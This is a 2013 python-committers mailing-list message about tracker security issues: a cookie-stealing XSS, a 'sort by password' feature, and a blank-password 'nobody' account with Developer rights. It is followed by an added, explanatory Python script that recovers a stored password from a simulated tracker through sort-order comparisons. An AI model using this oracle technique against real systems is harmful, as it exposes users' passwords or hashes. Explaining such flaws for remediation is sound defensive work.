On Mon, 15 Jul 2013 11:09:08 +0300, Michael Foord <mich...@voidspace.org.uk> wrote:

> On 15 Jul 2013, at 11:05, "M.-A. Lemburg" <m...@python.org> wrote:
>
>> Who would be the one to contact for issues like these ?
>>
>> The case is rather urgent, since the XSS can be used for stealing
>> session cookies on *.python.org.
>>
>> The sorting by password issue is a more obscure one. Just removing
>> the "feature" to sort by password should be enough to solve it.
>
> Technically it's an infrastructure issue (cc'd), but fixing the code of
> roundup is hardly their domain.
>
> Ezio Melotti (cc'd) did a lot of work on the Python installation of roundup,
> so he may have a better idea.
>
> We have a security mailing list but that is mainly intended for security
> issues in the language:
>
> secur...@python.org <secur...@python.org>
The OP also emailed security (which I heard about via IRC, I'm not on that list). Ezio is a Roundup developer, so he is indeed the best person to look at the XSS issue, since it is a Roundup problem and not specific to the Tracker. I can take a look too but he is more knowledgeable than I about roundup itself.

There is another problem which is specific to our tracker and which is the bigger issue right at the moment. We have a 'nobody' user with a blank password and Developer privileges. I'm about to go out, so I don't want to make a change that might break something right this moment, but anyone with the Coordinator role could take this on if they want to do it right now: remove either the Developer role, or both roles, from that user and see what happens. I suspect that user should not exist at all, but I don't know for sure.

--David

_______________________________________________
python-committers mailing list
python-committers@python.org
http://mail.python.org/mailman/listinfo/python-committers
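The thread calls the "sort by password" issue obscure and does not spell out the mechanism. The example below is added here and is not code from the thread, from Roundup, or from the bugs.python.org tracker; it models the general reason that letting users sort a listing by a secret column is a problem: every sorted listing answers one comparison question about the stored value, and repeated comparisons recover the value. It assumes a hypothetical tracker that stores one string per user in the password column, lets any logged-in user list users sorted by that column, and lets the attacker self-register accounts whose stored string they choose; the `Tracker`, `SortOracle`, `recover` and `demo` names, the usernames and the secret `s3cr3tpw` are all constructed for the illustration. The blank-password case at the end is included because a blank stored value sorts first and is confirmed with a single listing.

```python
"""Added example: a 'sort by password' listing used as a comparison oracle.

Hypothetical model, not taken from Roundup or the python.org tracker:
  * the tracker stores one string per user in the password column and
    sorts bytewise on it when asked to "sort by password";
  * the attacker can create and delete accounts whose stored string they
    choose, and can see the order of usernames in the sorted listing.
"""
import string

# Characters the secret may contain, listed in the tracker's sort order
# (ASCII: digits before lowercase letters). Two sentinel characters that
# sort below and above every alphabet character let probes avoid ties.
SECRET_ALPHABET = string.digits + string.ascii_lowercase
LOW, HIGH = "!", "~"


class Tracker:
    """Constructed stand-in for a tracker with a leaky 'sort by password'."""

    def __init__(self, users):
        self._users = dict(users)          # username -> stored password string

    def create_user(self, name, stored):
        self._users[name] = stored

    def delete_user(self, name):
        self._users.pop(name, None)

    def list_sorted_by_password(self):
        # Sort on the stored string alone, exactly as the feature would.
        return [n for n, _ in sorted(self._users.items(), key=lambda kv: kv[1])]


class SortOracle:
    """Everything the attacker learns comes from the order of usernames."""

    def __init__(self, tracker, target):
        self.tracker, self.target, self.queries = tracker, target, 0

    def probe_sorts_before_target(self, value):
        """True iff a row whose stored string is `value` lists before target.
        Costs one account creation and one listing (the hypothetical probe
        username is assumed not to collide with an existing account)."""
        self.queries += 1
        self.tracker.create_user("probe", value)
        order = self.tracker.list_sorted_by_password()
        self.tracker.delete_user("probe")
        return order.index("probe") < order.index(self.target)


def recover(oracle):
    """Recover the target's stored string one character at a time.

    Invariant: `known` is a prefix of the secret. For position i,
    (known + c + HIGH) sorts before the secret exactly when secret[i] > c,
    so a binary search over SECRET_ALPHABET finds secret[i] in ~6 listings.
    (known + LOW) sorts before the secret exactly when the secret is longer
    than `known`, which gives the termination test without any tie.
    """
    known = ""
    while True:
        if not oracle.probe_sorts_before_target(known + LOW):
            return known                     # secret == known
        lo, hi = 0, len(SECRET_ALPHABET) - 1 # answer index lies in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.probe_sorts_before_target(known + SECRET_ALPHABET[mid] + HIGH):
                lo = mid + 1                 # secret[i] > alphabet[mid]
            else:
                hi = mid                     # secret[i] <= alphabet[mid]
        known += SECRET_ALPHABET[lo]


def demo(secret="s3cr3tpw"):
    """Run the attack against a constructed tracker; returns (recovered, queries)."""
    tracker = Tracker({"alice": "hunter2", "nobody": "", "victim": secret})
    oracle = SortOracle(tracker, "victim")
    return recover(oracle), oracle.queries


if __name__ == "__main__":
    value, n = demo()
    print(f"recovered {value!r} with {n} sorted listings")
    print("blank password confirmed with", demo("")[1], "listing")
```

The cost is about seven listings per character, independent of how strong the stored value is: if the column holds a hash, the attacker learns the hash rather than the password, but still learns it. Removing the sort option, as the thread proposes, closes the oracle; the same reasoning applies to any user-controllable sort, filter or "starts with" search on a secret column.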